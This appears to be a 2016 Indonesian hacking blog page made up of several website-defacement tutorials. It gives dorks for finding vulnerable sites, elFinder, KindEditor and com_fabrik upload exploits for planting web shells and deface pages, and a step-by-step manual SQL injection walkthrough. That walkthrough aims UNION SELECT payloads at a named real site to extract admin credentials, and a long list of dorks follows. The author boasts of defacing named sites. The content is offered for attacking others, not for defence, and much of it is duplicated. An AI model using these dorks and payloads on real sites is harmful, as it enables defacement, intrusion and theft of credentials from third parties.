Hallo Euyy, kali ini gw mw berbagi sedikit ilmu yg gw pnya, ok langsung aja gw mw ngasih dork fresh elfinder :D
site:606h.net
site:xx.tn
site:id.ai
site:tuars.co
site:tuars.com
site:tuars.net
site:nazuka.net
site:idwebs.info
site:tom1.net
site:patelhost.com
site:cc.vg
site:ye.vc
site:uk.ht
site:lk6.co
site:bugs3.com
site:3hoo.info
site:smart-hosting.info
site:host78.com
site:allalla.com
site:borazjau.net
Cheat garena site:xx.tn
Nah cman itu aja yg gw pnya klo mw dpt web yg perawan lu kembangin dorknya
Zona Komputer
Popular Posts
-
Halo Blogger, Kali ini saya akan tunjukan cara membuat virus trojan yang tidak berbahaya dengan sangat mudah menggunakan notepad tapi cuk...
-
Hallo Euyy, kali ini gw mw berbagi sedikit ilmu yg gw pnya, ok langsung aja gw mw ngasih dork fresh elfinder :D site:606h.net site:xx.tn ...
-
Sebelum mulai ke topik saya mau minta maaf karena sudah lama tidak posting di blog ini. Saya juga banyak kesibukan di dunia nyata. Ok tanpa ...
-
Virus komputer adalah sebuah program perangkat lunak berbahaya yang ditulis dengan sengaja untuk memasuki komputer tanpa izin atau tanp...
-
Kali ini saya akan berbagi cara deface website menggunkan webdav, bagi newbie seperti saya tutor ini mungkin sangat bermanfaat untuk ...
-
Halo kembali dengan saya , kali ini saya akan share cara ngedeface website yang berdomain dari nazuka.Tutorial ini gampang dilakukan dan ju...
-
Sebagian besar masyarakat dunia kini menggunakan internet, bahkan bisa dikatakan hampir semua orang khususnya di perkotaan telah mengeny...
-
Hacker atau Peretas biasanya identik dengan dunia kejahatan jika memang tidak dimanfaatkan dengan baik. Mereka lebih banyak diam denga...
-
Hari ini saya mau share tutorial cara deface dengan teknik web kineditor.Teknik ini sangat mudah sekali karena teknik ini cuman upload scri...
-
Banyak virus yang bertebaran melalui flasdisk, kali ini saya akan memberikan cara melindungi komputer dari virus-virus yang berasal d...
Minggu, 04 Desember 2016
Rabu, 23 November 2016
Cara Deface Website Berdomain Dari Nazuka
Halo kembali dengan saya , kali ini saya akan share cara ngedeface website yang berdomain dari nazuka.Tutorial ini gampang dilakukan dan juga masih banyak yang perawan atau belum di deface oleh orang lain.Ok daripada basa-basi mending saya langsung ke topik nya.
Dork Google :
1.Cari salah satu websitenya misalkan saya dapat web ini http://efemuxani.tuars.co.
2.langsung masukan exploit nya /_file-manager/php/connector.php contohnya seperti ini http://efemuxani.tuars.co/_file-manager/php/connector.php
4.Kalo sudah berhasil langsung masukan /dreblix404.php contohnya seperti ini http://efemuxani.tuars.co/dreblix404.php
5.Setelah itu upload shellnya, lalu masuk ke shell anda contohnya seperti ini http://efemuxani.tuars.co/NamaShellAnda.php
6.Tinggal tebas Index.php nya
7.Congratulation anda berhasil deface website
Itu saja yang saya bisa berikan mohon maaf bila ada kesalahan kalo\au anda masih bingung bisa curat-coret di komentar.
Dork Google :
- site:id.ai
- site:nazuka.net
- site:cc.vg
1.Cari salah satu websitenya misalkan saya dapat web ini http://efemuxani.tuars.co.
2.langsung masukan exploit nya /_file-manager/php/connector.php contohnya seperti ini http://efemuxani.tuars.co/_file-manager/php/connector.php
Kalo seperti gambar diatas berarti website bisa di deface
3.Copy link tersebut masukan ke revolution.id.ai pastekan ke kolomnya lalu tekan exploit 1 jika gagal klik exploit 2
5.Setelah itu upload shellnya, lalu masuk ke shell anda contohnya seperti ini http://efemuxani.tuars.co/NamaShellAnda.php
6.Tinggal tebas Index.php nya
7.Congratulation anda berhasil deface website
Itu saja yang saya bisa berikan mohon maaf bila ada kesalahan kalo\au anda masih bingung bisa curat-coret di komentar.
Rabu, 09 November 2016
Cara Deface Website Dengan Teknik Web KindEditor
Hari ini saya mau share tutorial cara deface dengan teknik web kineditor.Teknik ini sangat mudah sekali karena teknik ini cuman upload script deface doang, anak kecil pun bisa melakukan nya masa anda kagak bisa ckckckckkckck.ok simak tutorialnya
3.Kalo Sudah dapat web target,klik upload
4.Kemudian masukan script deface
5.Nanti akan keluar hasil upload,copy url tersebut dan masukan ke url
6.Tinggal klik enter
7.Congratulation!!!
Contoh website yang saya Deface dengan teknik kineditor
http://apps.pts80.net/KEditor/attached/file/20161109/20161109172900_31601.html
- inurl:examples/uploadbutton.html
- inurl:kindeditor
3.Kalo Sudah dapat web target,klik upload
4.Kemudian masukan script deface
5.Nanti akan keluar hasil upload,copy url tersebut dan masukan ke url
6.Tinggal klik enter
7.Congratulation!!!
Contoh website yang saya Deface dengan teknik kineditor
http://apps.pts80.net/KEditor/attached/file/20161109/20161109172900_31601.html
Kamis, 03 November 2016
Cara Deface Website Dengan Metode Com_Fabrik
Sebelum mulai ke topik saya mau minta maaf karena sudah lama tidak posting di blog ini. Saya juga banyak kesibukan di dunia nyata. Ok tanpa banyak basa-basi lagi,sesuai dengan postigan ini saya akan sharing cara deface website dengan metode com_fabrik.
Langsung aja simak tutorial dibawah ini :
1.Dork : inurl:viewtable.php?cid= site:uk ( dork bisa dikebangin seperti site:bz,br,cz,gr,ru,dll )
2.Setelah itu masukan exploitnya : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3.Contoh website http://ghostshockey.it
4.Buka sitenya dan masukan exploitya http://ghostshockey.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
5.Klik piih upload atau Choose File
6.Lalu masukan script deface
7.Tekan import CSV
8.Kalo berhasil langsung masuk ke site http://ghostshockey.it/media/namafilelu.html
Contoh Website yang saya deface :
http://gostsockey.it/media/Ryu404.html
Sekian yang bisa saya deface jika ada yang masih bingung tinggal curcor aja di komen insya allah saya akan bantu.. :D
Langsung aja simak tutorial dibawah ini :
1.Dork : inurl:viewtable.php?cid= site:uk ( dork bisa dikebangin seperti site:bz,br,cz,gr,ru,dll )
2.Setelah itu masukan exploitnya : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3.Contoh website http://ghostshockey.it
4.Buka sitenya dan masukan exploitya http://ghostshockey.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
5.Klik piih upload atau Choose File
6.Lalu masukan script deface
7.Tekan import CSV
8.Kalo berhasil langsung masuk ke site http://ghostshockey.it/media/namafilelu.html
Contoh Website yang saya deface :
http://gostsockey.it/media/Ryu404.html
Sekian yang bisa saya deface jika ada yang masih bingung tinggal curcor aja di komen insya allah saya akan bantu.. :D
Sabtu, 29 Oktober 2016
Cara Deface Website Menggunakan SQL Injection Manual
hello, kali ini Saya akan membagikan tutorial cara deface web menggunakan metode SQL Injection MANUAL
apa itu SQL INJECTION .?
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database.
Penyebab utama dari celah ini adalah variable yang kurang di filter : id=$id;……. > Got Error
Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url
Apabila terlihat pesan error seperti ini :
Maka bisa dipastikan situs tersebut terdapat celah SQL Injection…
dalam sql manual kita butuh plugin tambahan untuk membantu proses ini, nama plugin nya adalah HACKBAR,
Hackbar ini sebenarnya berfungsi untuk menguji sistem kita misalnya dari sql injection.. atau XSS attack.. atau mengenkripsi password md5 ataupun SHA-1
Hackbar bias di dapat disini:
Hackbar
Sekarang kita mulai SQL Injectionnya
Pertama yang kita lakukan adalah mencari web yang vuln SQLi ( ada bug sqlinjection ) dengan sebuah dork
Sebenarnya dork itu banyak tapi kemnculan dork-dork baru tergantung kreatifitas individu masing-masing
oke langsung saja Copas ( copy paste ) salah satu dork tersebut ke google search
Setelah itu kita pilih salah satu url dari hasil dork tersebut
contoh :
nah sekarang kita test apakan vuln website tersebut dengan menambahkan tanda (‘) tanpa tanda kurung
Di gambar tersebut kita lihat bahwa situs ini vuln SQLi ( mempunyai bug SQL injection)
Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip
Bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali
Berarti jumlah kolom pada database nya ada 6 kolom
Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya.
Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – di depan angka
Di gambar tersebut kita lihat muncul angka 2 dan 3 nah itulah yang kita maksud dengan angka yang kita buat memasukan perintah-perintah selanjutnya
Sekarang tahap selanjutnya ialah mengetahui versi database nya
Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi
Nahh di gambar kita bisa lihat muncul 5.0.96 itu berarti database web tersebut versi 5 berarti kita beruntung karena jika kita menemukan versi 4. maka kita akan kerepotan karena jenis perintah SQL nya berbeda yaitu dengan menebak 1 per 1 tabel yang ada di dalam database tersebut
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda —
Dari gambar tersebut terlihat ada table “ admin ” jika kita menemukan web lain dan di dalamnya tidak ada table admin maka biasanya user pass admin terletak pada kolom administrator atau user tinggal pandai-pandainya kita mencermati setiap tabel yang kita curigai sebagai tempat user pass admin.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut
Degan cara mengganti perintah “ table_name ” yang ada berada dalam perintah “ group_concat(table_name) ” dengan perintah “ column_name ” menjadi “ group_concat(column_name) ” dan mengganti perintah “ .tables ” yang berada di perintah “ information_schema.tables “ dengan perintah “ .columns ” menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name= ”
dan di ikuti hasil convert MySQL CHAR() nah disini keuntungan dari kita memakai HACKBAR yaitu kita tidak perlu mencari converter MySQL CHAR() ke web-web lain karena hackbar sudah menyediakanya letaknya:
klik tombol SQL –> MySQL –> MySQL CHAR()
setelah itu akan muncul javaScript Aplication sebagai berikut:
kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin
contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu klik ok
sehingga perintah kita menjadi
Setelah itu tekan Execute
Dan hasilnya
Nahh muncul kolom adminId,adminName,adminPass
Sekarang langkah selanjutnya ialah membuka data2 yang ada dalam kolom-kolom yang muncul tersebut.
Caranya ialah mengganti perintah “ column_name “ yang berada di perintah “ group_concat(table_name) ” dengan nama-nama kolom yang kita temukan tadi yaitu “adminId,adminName,adminPass ” sehingga menjadi “ group_concat(adminId,adminName,adminPass) ” dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ perintah admin ini saya dapat dari nama table yang kita temukan tadi, jangan lupa menambahkan perintah 0x3a pada sela-sela nama kolom tadi 0x3a adalah hasil hexa dari tanda :
Sehingga jika digabung perintah nya menjadi
tekan Execute
dan hasilnya
Setelah itu tinggal nyari admin loginya heheheheh
Sebenarnya banyak variasi sql injection semunya tergantung individu masing-masing mau pakai cara mana yang paling nyaman buat soba
apa itu SQL INJECTION .?
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database.
Penyebab utama dari celah ini adalah variable yang kurang di filter : id=$id;……. > Got Error
Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url
Contoh : http://situsq.com/berita.php?id=14’ http://situsq.com/berita.php?id=’14 |
You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1 |
dalam sql manual kita butuh plugin tambahan untuk membantu proses ini, nama plugin nya adalah HACKBAR,
Hackbar ini sebenarnya berfungsi untuk menguji sistem kita misalnya dari sql injection.. atau XSS attack.. atau mengenkripsi password md5 ataupun SHA-1
Hackbar bias di dapat disini:
Hackbar
Sekarang kita mulai SQL Injectionnya
Pertama yang kita lakukan adalah mencari web yang vuln SQLi ( ada bug sqlinjection ) dengan sebuah dork
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: filesize()
“id=” & intext:”Warning: require()
WOW banyak amat -_-, memang banyak sob soalnya dork buat cari target itu ngak cukup 1 dan juga ngak sekali cari ketemu,inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: filesize()
“id=” & intext:”Warning: require()
Sebenarnya dork itu banyak tapi kemnculan dork-dork baru tergantung kreatifitas individu masing-masing
oke langsung saja Copas ( copy paste ) salah satu dork tersebut ke google search
Setelah itu kita pilih salah satu url dari hasil dork tersebut
contoh :
http://www.zenfocus.com/partners.php?id=2 |
Di gambar tersebut kita lihat bahwa situs ini vuln SQLi ( mempunyai bug SQL injection)
Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip
Bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali
Contoh: http://www.zenfocus.com/partners.php?id=2 order by 1– no error http://www.zenfocus.com/partners.php?id=2 order by 2– no error http://www.zenfocus.com/partners.php?id=2 order by 3– no error http://www.zenfocus.com/partners.php?id=2 order by 4– no error http://www.zenfocus.com/partners.php?id=2 order by 5– no error http://www.zenfocus.com/partners.php?id=2 order by 6– no error http://www.zenfocus.com/partners.php?id=2 order by 7– error |
Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya.
Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – di depan angka
Contoh: http://www.zenfocus.com/partners.php?id=-2 union select 1,2,3,4,5, 6– |
Di gambar tersebut kita lihat muncul angka 2 dan 3 nah itulah yang kita maksud dengan angka yang kita buat memasukan perintah-perintah selanjutnya
Sekarang tahap selanjutnya ialah mengetahui versi database nya
Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi
Contoh: http://www.zenfocus.com/partners.php?id=-2 union select 1,@@version,3,4,5, 6– |
Nahh di gambar kita bisa lihat muncul 5.0.96 itu berarti database web tersebut versi 5 berarti kita beruntung karena jika kita menemukan versi 4. maka kita akan kerepotan karena jenis perintah SQL nya berbeda yaitu dengan menebak 1 per 1 tabel yang ada di dalam database tersebut
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda —
Contoh: http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()– |
Dari gambar tersebut terlihat ada table “ admin ” jika kita menemukan web lain dan di dalamnya tidak ada table admin maka biasanya user pass admin terletak pada kolom administrator atau user tinggal pandai-pandainya kita mencermati setiap tabel yang kita curigai sebagai tempat user pass admin.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut
Degan cara mengganti perintah “ table_name ” yang ada berada dalam perintah “ group_concat(table_name) ” dengan perintah “ column_name ” menjadi “ group_concat(column_name) ” dan mengganti perintah “ .tables ” yang berada di perintah “ information_schema.tables “ dengan perintah “ .columns ” menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name= ”
dan di ikuti hasil convert MySQL CHAR() nah disini keuntungan dari kita memakai HACKBAR yaitu kita tidak perlu mencari converter MySQL CHAR() ke web-web lain karena hackbar sudah menyediakanya letaknya:
klik tombol SQL –> MySQL –> MySQL CHAR()
setelah itu akan muncul javaScript Aplication sebagai berikut:
kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin
contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu klik ok
sehingga perintah kita menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)– |
Dan hasilnya
Nahh muncul kolom adminId,adminName,adminPass
Sekarang langkah selanjutnya ialah membuka data2 yang ada dalam kolom-kolom yang muncul tersebut.
Caranya ialah mengganti perintah “ column_name “ yang berada di perintah “ group_concat(table_name) ” dengan nama-nama kolom yang kita temukan tadi yaitu “adminId,adminName,adminPass ” sehingga menjadi “ group_concat(adminId,adminName,adminPass) ” dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ perintah admin ini saya dapat dari nama table yang kita temukan tadi, jangan lupa menambahkan perintah 0x3a pada sela-sela nama kolom tadi 0x3a adalah hasil hexa dari tanda :
Sehingga jika digabung perintah nya menjadi
